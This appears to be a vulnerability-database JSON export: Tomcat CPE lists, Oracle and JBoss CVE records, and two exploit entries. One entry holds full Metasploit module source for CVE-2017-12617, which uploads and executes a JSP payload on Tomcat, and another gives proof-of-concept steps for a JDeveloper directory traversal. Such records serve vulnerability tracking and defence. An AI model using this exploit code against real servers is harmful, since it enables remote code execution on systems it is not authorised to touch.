"cpe:2.3:a:apache:tomcat:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:tomcat:8.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone10:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone11:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone12:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone13:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone14:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone15:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone16:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone17:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone18:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone19:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone2:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone20:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone21:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone22:*:*:*:*:*:*", 
"cpe:2.3:a:apache:tomcat:9.0.0:milestone3:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone4:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone5:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone6:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone7:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone8:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:milestone9:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-02T05:24:50", "description": "Exploit for java platform in category web applications", "cvss3": {}, "published": "2018-01-18T00:00:00", "type": "zdt", "title": "Oracle JDeveloper IDE Directory Traversal Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-18T00:00:00", "id": "1337DAY-ID-29579", "href": "https://0day.today/exploit/description/29579", "sourceData": "[+] Credits: John Page (aka hyp3rlinx) \r\n\r\nVendor:\r\n=============\r\nwww.oracle.com\r\n\r\n\r\nProduct:\r\n===========\r\nJDeveloper IDE\r\n\r\nOracle JDeveloper is a free integrated development environment that simplifies the development of Java-based\r\napplications addressing every step of the application lifecycle.\r\n\r\n\r\n\r\nVulnerability Type:\r\n===================\r\nDirectory Traversal\r\n\r\n\r\n\r\nCVE Reference:\r\n==============\r\nCVE-2017-10273\r\n\r\n\r\n\r\nSecurity Issue:\r\n================\r\nAttackers can place malicious files outside intended target directories if tricked into importing corrupt .WAR or .EAR archives.\r\nLater, attackers can potentially request these scripts/files to execute system commands on affected target.\r\n\r\n\r\nAffected versions:\r\n11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0\r\n\r\n\r\nReferences:\r\n============\r\nhttp://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\r\n\r\n\r\n\r\nExploit/POC:\r\n=============\r\n1) create evil .WAR or .EAR archive containing ../ in path name to initiate directory traversal and inside a 
script to execute system commands.\r\n2) import into JDeveloper\r\n3) files get moved outside target directories to one of the attackers choosing.\r\n4) attacker requests the malicious file contained in target directory.\r\n\r\nBAM!\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/29579", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-05T03:10:51", "description": "This Metasploit module uploads a jsp payload and executes it.", "cvss3": {}, "published": "2017-10-12T00:00:00", "type": "zdt", "title": "Apache Tomcat JSP Upload Bypass Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2017-10-12T00:00:00", "id": "1337DAY-ID-28780", "href": "https://0day.today/exploit/description/28780", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Tomcat RCE via JSP Upload Bypass',\r\n 'Description' => %q{\r\n This module uploads a jsp payload and executes it.\r\n },\r\n 'Author' => 'peewpw',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-12617' ],\r\n [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ],\r\n [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => %w{ linux win }, # others?\r\n 'Targets' =>\r\n [\r\n [ 'Automatic',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Java Windows',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Java Linux',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 
'DisclosureDate' => 'Oct 03 2017',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, \"The URI path of the Tomcat installation\", \"/\"]),\r\n Opt::RPORT(8080)\r\n ])\r\n end\r\n\r\n def check\r\n testurl = Rex::Text::rand_text_alpha(10)\r\n testcontent = Rex::Text::rand_text_alpha(10)\r\n\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, \"#{testurl}.jsp/\"),\r\n 'method' => 'PUT',\r\n 'data' => \"<% out.println(\\\"#{testcontent}\\\");%>\"\r\n })\r\n\r\n res1 = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, \"#{testurl}.jsp\"),\r\n 'method' => 'GET'\r\n })\r\n\r\n if res1 && res1.body.include?(testcontent)\r\n send_request_cgi(\r\n opts = {\r\n 'uri' => normalize_uri(target_uri.path, \"#{testurl}.jsp/\"),\r\n 'method' => 'DELETE'\r\n },\r\n timeout = 1\r\n )\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"Uploading payload...\")\r\n testurl = Rex::Text::rand_text_alpha(10)\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, \"#{testurl}.jsp/\"),\r\n 'method' => 'PUT',\r\n 'data' => payload.encoded\r\n })\r\n if res && res.code == 201\r\n res1 = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, \"#{testurl}.jsp\"),\r\n 'method' => 'GET'\r\n })\r\n if res1 && res1.code == 200\r\n print_status(\"Payload executed!\")\r\n else\r\n fail_with(Failure::PayloadFailed, \"Failed to execute the payload\")\r\n end\r\n else\r\n fail_with(Failure::UnexpectedReply, \"Failed to upload the payload\")\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-02-05] #", "sourceHref": "https://0day.today/exploit/28780", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "prion": [{"lastseen": "2023-11-22T02:57:35", "description": "Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Web Server Plugin). 
The supported version that is affected is 11.1.2.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Access Manager accessible data. CVSS 3.0 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10262"], "modified": "2018-01-25T13:52:00", "id": "PRION:CVE-2017-10262", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-10262", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T02:57:36", "description": "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. 
Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", "cvss3": {"exploitabilityScore": 0.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-25T13:52:00", "id": "PRION:CVE-2017-10273", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-10273", "cvss": 
{"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T02:57:46", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). 
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 9.9, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.3}, "published": "2017-10-19T17:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10352"], "modified": "2019-10-03T00:03:00", "id": "PRION:CVE-2017-10352", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-10352", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T02:57:13", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition component of Oracle Fusion Middleware (subcomponent: Analytics Web Dashboards). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. 
Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Buffer overflow", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10068"], "modified": "2019-10-03T00:03:00", "id": "PRION:CVE-2017-10068", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-10068", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-11-22T02:44:24", "description": "Vulnerability in the Oracle WebCenter Content component of Oracle Fusion Middleware (subcomponent: Content Server). The supported version that is affected is 11.1.1.9.0. 
Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Content. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Content, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebCenter Content accessible data as well as unauthorized read access to a subset of Oracle WebCenter Content accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2564"], "modified": "2019-10-03T00:03:00", "id": "PRION:CVE-2018-2564", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-2564", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-11-22T03:56:11", 
"description": "Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-09T17:29:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2020-07-15T03:15:00", "id": "PRION:CVE-2015-7501", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-7501", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T02:44:41", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition component of Oracle Fusion Middleware (subcomponent: BI Platform 
Security). Supported versions that are affected are 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.0 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2715"], "modified": "2020-08-24T17:37:00", "id": "PRION:CVE-2018-2715", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-2715", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T02:44:24", "description": "Vulnerability in the Oracle HTTP Server component of Oracle Fusion Middleware (subcomponent: Web Listener). 
Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 12.1.3.0.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle HTTP Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-01-18T02:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2561"], "modified": "2018-01-25T13:53:00", "id": "PRION:CVE-2018-2561", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-2561", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-22T02:44:42", "description": "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. 
